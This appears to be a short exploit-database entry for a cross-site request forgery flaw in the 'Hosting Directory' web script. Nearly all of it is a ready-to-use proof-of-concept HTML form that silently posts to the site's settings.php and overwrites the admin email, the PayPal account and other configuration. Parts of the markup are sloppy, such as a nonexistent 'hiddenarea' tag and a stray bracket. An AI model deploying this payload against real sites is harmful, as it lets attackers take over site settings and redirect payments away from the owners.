Hosting Directory suffers from a cross site request forgery vulnerability.
f5b7ec08c27fca03b77d689507896d098982eeefc29ddf78791d5edcec51bfc0
# Exploit Title: Hosting Directory CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/hosting-directory-script/27433/
# Category:: webapps
# Demo : http://www.e-soft24.com/scripts/hosting-directory/admin
# Greetz: Inj3ct0r Exploit DataBase 1337day.com
<form method="post" action="settings.php">
<input name="site_title" size="40" value="Hosting Directory" type="hidden">
<input name="base" size="40" value="http://www.e-soft24.com/scripts/hosting-directory" type="hidden">
<input name="admin_mail" size="40" value="mail@mail.com" type="hidden">
<input name="paypal" size="40" value="yourpaypalaccoun@paypal.com" type="hidden">
<hiddenarea rows="3" cols="30" type="hidden" name="meta_d">Our web host directory is growing daily with links to hot hosting providers. Add your own hosting website to have your customers rate it to generate more traffic for your business.</hiddenarea>
<input name="meta_k" size="40" value="web, host, directory, hosting, server" type="hidden">
<select name="admin_approved" size="1"><option value="yes" selected="">yes</option>
<option value="no">no</option></select><
<select name="style_color" size="1"><option value="red" selected>red</option>
<option value="blue">blue</option>
<option value="chrome">chrome</option>
<option value="purple">purple</option>
<option value="orange">orange</option>
<option value="green" selected="selected">green</option></select>
<input name="category" size="5" value="10" type="hidden">
<input name="popular" size="5" value="10" type="hidden">
<input name="new" size="5" value="10" type="hidden">
<input name="search" size="5" value="10" type="hidden">
<input name="submit" value="Update" type="submit">
</form>